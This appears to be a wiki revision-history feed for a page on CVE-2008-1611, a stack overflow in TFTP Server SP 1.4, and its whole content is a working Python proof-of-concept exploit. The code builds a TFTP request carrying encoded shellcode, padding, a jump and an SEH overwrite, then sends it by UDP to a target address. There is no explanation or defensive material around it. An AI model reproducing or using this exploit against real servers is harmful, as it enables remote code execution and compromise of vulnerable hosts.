https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2008-1611_TFTP_Server_SP_1.4%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
CVE-2008-1611 TFTP Server SP 1.4堆棧緩衝區溢出漏洞 - Revision history
2026-04-11T07:13:46Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2008-1611_TFTP_Server_SP_1.4%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=849&oldid=prev
Pwnwiki: Created page with "==POC== <pre> import struct import socket # CVE-2008-1611 PoC written by Axua prefix = "\x00\x02\x2f\x2e\x3a\x2f" suffix = "\x00\x00\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00"..."
2021-04-01T03:36:22Z
<p>Created page with "==POC== <pre> import struct import socket # CVE-2008-1611 PoC written by Axua prefix = "\x00\x02\x2f\x2e\x3a\x2f" suffix = "\x00\x00\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00"..."</p>
<p><b>New page</b></p><div>==POC==<br />
<pre><br />
import struct<br />
import socket<br />
<br />
# CVE-2008-1611 PoC written by Axua<br />
<br />
prefix = "\x00\x02\x2f\x2e\x3a\x2f"<br />
suffix = "\x00\x00\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00"<br />
<br />
shellcode = (<br />
"\xbb\x1b\xd0\x39\x36\xdd\xc7\xd9\x74\x24\xf4\x58\x29\xc9\xb1"<br />
"\x52\x31\x58\x12\x03\x58\x12\x83\xdb\xd4\xdb\xc3\x27\x3c\x99"<br />
"\x2c\xd7\xbd\xfe\xa5\x32\x8c\x3e\xd1\x37\xbf\x8e\x91\x15\x4c"<br />
"\x64\xf7\x8d\xc7\x08\xd0\xa2\x60\xa6\x06\x8d\x71\x9b\x7b\x8c"<br />
"\xf1\xe6\xaf\x6e\xcb\x28\xa2\x6f\x0c\x54\x4f\x3d\xc5\x12\xe2"<br />
"\xd1\x62\x6e\x3f\x5a\x38\x7e\x47\xbf\x89\x81\x66\x6e\x81\xdb"<br />
"\xa8\x91\x46\x50\xe1\x89\x8b\x5d\xbb\x22\x7f\x29\x3a\xe2\xb1"<br />
"\xd2\x91\xcb\x7d\x21\xeb\x0c\xb9\xda\x9e\x64\xb9\x67\x99\xb3"<br />
"\xc3\xb3\x2c\x27\x63\x37\x96\x83\x95\x94\x41\x40\x99\x51\x05"<br />
"\x0e\xbe\x64\xca\x25\xba\xed\xed\xe9\x4a\xb5\xc9\x2d\x16\x6d"<br />
"\x73\x74\xf2\xc0\x8c\x66\x5d\xbc\x28\xed\x70\xa9\x40\xac\x1c"<br />
"\x1e\x69\x4e\xdd\x08\xfa\x3d\xef\x97\x50\xa9\x43\x5f\x7f\x2e"<br />
"\xa3\x4a\xc7\xa0\x5a\x75\x38\xe9\x98\x21\x68\x81\x09\x4a\xe3"<br />
"\x51\xb5\x9f\xa4\x01\x19\x70\x05\xf1\xd9\x20\xed\x1b\xd6\x1f"<br />
"\x0d\x24\x3c\x08\xa4\xdf\xd7\xf7\x91\xbd\x33\x90\xe3\x41\x2d"<br />
"\x3c\x6d\xa7\x27\xac\x3b\x70\xd0\x55\x66\x0a\x41\x99\xbc\x77"<br />
"\x41\x11\x33\x88\x0c\xd2\x3e\x9a\xf9\x12\x75\xc0\xac\x2d\xa3"<br />
"\x6c\x32\xbf\x28\x6c\x3d\xdc\xe6\x3b\x6a\x12\xff\xa9\x86\x0d"<br />
"\xa9\xcf\x5a\xcb\x92\x4b\x81\x28\x1c\x52\x44\x14\x3a\x44\x90"<br />
"\x95\x06\x30\x4c\xc0\xd0\xee\x2a\xba\x92\x58\xe5\x11\x7d\x0c"<br />
"\x70\x5a\xbe\x4a\x7d\xb7\x48\xb2\xcc\x6e\x0d\xcd\xe1\xe6\x99"<br />
"\xb6\x1f\x97\x66\x6d\xa4\xa9\x97\xbf\x31\x3d\x0e\x2a\x78\x23"<br />
"\xb1\x81\xbf\x5a\x32\x23\x40\x99\x2a\x46\x45\xe5\xec\xbb\x37"<br />
"\x76\x99\xbb\xe4\x77\x88")<br />
<br />
padding1 = "\x41" * 236<br />
padding2 = "\x42" * (984 - len(shellcode))<br />
<br />
far_jump = "\xE9\x23\xFC\xFF\xFF"<br />
<br />
nseh = "\xEB\xF9\x90\x90" # jmp short -8<br />
seh = "\x8c\x2b\x40" # POP EDI; POP EBP; RET; @ TFTPServerSP.exe # partial overwrite 0x00402b8c<br />
<br />
payload = prefix<br />
payload += padding1<br />
payload += shellcode<br />
payload += padding2<br />
payload += far_jump<br />
payload += nseh <br />
payload += seh <br />
payload += suffix<br />
<br />
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)<br />
s.sendto(payload, ("192.168.99.155", 69))<br />
<br />
<br />
<br />
</pre></div>
Pwnwiki